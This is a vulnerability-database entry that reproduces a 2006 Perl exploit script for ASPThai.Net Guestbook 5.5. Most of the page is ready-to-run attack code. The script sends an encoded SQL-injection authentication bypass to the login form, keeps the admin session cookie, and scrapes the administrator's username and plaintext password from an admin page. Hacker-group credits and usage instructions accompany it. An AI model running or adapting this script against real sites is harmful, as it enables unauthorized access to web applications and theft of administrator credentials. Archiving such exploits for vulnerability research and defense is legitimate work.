Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:63350
HistoryJul 01, 2014 - 12:00 a.m.

ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit

2014-07-0100:00:00
Root
www.seebug.org
16
JSON

No description provided by source.


                                                #!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook &#60;= 5.5  
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net 
#irc.g00ns.net #g00ns  email = [email protected]
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;

$Server = $ARGV[0];

if($Server =~m/http/g)
{
$Server=~ &#39;http://$Server&#39;;
print 
}
else {
  print $error;
}

if(!$Server) {usage();exit() ;}

head();

print &#34;\r\nGrabbing Username And Password\r\n\n&#34;;

#Login&#39;s and stores a cookie to view admin panel later


 $xpl = LWP::UserAgent-&#62;new() or die;
 $cookie_jar = HTTP::Cookies-&#62;new();

 $xpl-&#62;agent(&#39;g00ns&#39;);
 $xpl-&#62;cookie_jar($cookie_jar);

 $res = $xpl-&#62;post(
 $Server.&#39;check_user.asp&#39;,
 Content =&#62; [ 

	&#39;txtUserName&#39; =&#62; &#39;\&#39; or \&#39;%67%30%30%6e%73\&#39;=\&#39;%67%30%30%6e%73&#39;, 
	&#39;txtUserPass&#39; =&#62; &#39;\&#39; or \&#39;%67%30%30%6e%73\&#39;=\&#39;%67%30%30%6e%73&#39;,
	&#39;Submit&#39; =&#62; &#39;-= Login =-&#39;,
 ],
 );

# Create a request
my $req = HTTP::Request-&#62;new(GET =&#62; 

$Server.&#39;change_admin_username.asp&#39;

);

$req-&#62;header(&#39;Referer&#39;, $Server.&#39;admin_menu.asp&#39;);

my $res = $xpl-&#62;request($req);

$info= $res-&#62;content;

if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) 
{ 
 die &#34;Error Connecting...\r\n&#34;; 
}

#Check the outcome of the response

$info=~m/(value=\&#34;)(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\&#34;)(\n+|\w+|\W+)/g;
$Pass= $2;

print &#34;UserName:$User\r\nPassword:$Pass\r\n&#34;;

sub head()
 {
 print &#34;\n=======================================================================\r\n&#34;;
 print &#34;* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n&#34;;   
 print &#34;=======================================================================\r\n&#34;;
 }
sub usage()
 {
 head();
 print &#34; Usage: Thaisql.pl &#60;Site&#62;  \r\n\n&#34;;
 print &#34; &#60;Site&#62; - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n&#34;;
 print &#34;=======================================================================\r\n&#34;;
 print &#34;   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n&#34;;
 print &#34;www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n&#34;;
 print &#34;=======================================================================\r\n&#34;;

# milw0rm.com [2006-02-06]
JSON